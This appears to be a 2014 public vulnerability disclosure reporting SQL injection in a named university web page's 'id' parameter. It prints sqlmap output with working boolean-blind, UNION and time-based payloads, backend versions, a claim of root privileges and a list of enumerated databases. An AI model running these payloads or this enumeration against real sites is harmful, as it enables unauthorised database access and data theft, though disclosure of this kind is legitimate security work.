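2014-08-28: Details reported to the vendor; awaiting vendor handling.
2014-09-02: The vendor chose to ignore the vulnerability; details disclosed to the public.
Main site
1. http://dxs.gzmu.edu.cn/sxpd/content.php?id=359 (GET), root privileges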
web application technology: PHP 5.3.5
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=359' AND 8693=8693 AND 'KlxX'='KlxX

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-3746' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71756a6f71,0x55766d537058626c4262,0x716b626471),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=359' AND SLEEP(5) AND 'XDqn'='XDqn
---
web application technology: PHP 5.3.5
back-end DBMS: MySQL 5.0.11
available databases [10]:
[*] cdcol
[*] discuz
[*] dxswz
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] vip118
[*] vote
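2. dxswz has 198 tables; I did not enumerate the tables any further.
Fix it when the semester starts.
Severity: no impact (ignored by vendor)
Ignored at: 2014-09-02 13:02
None yet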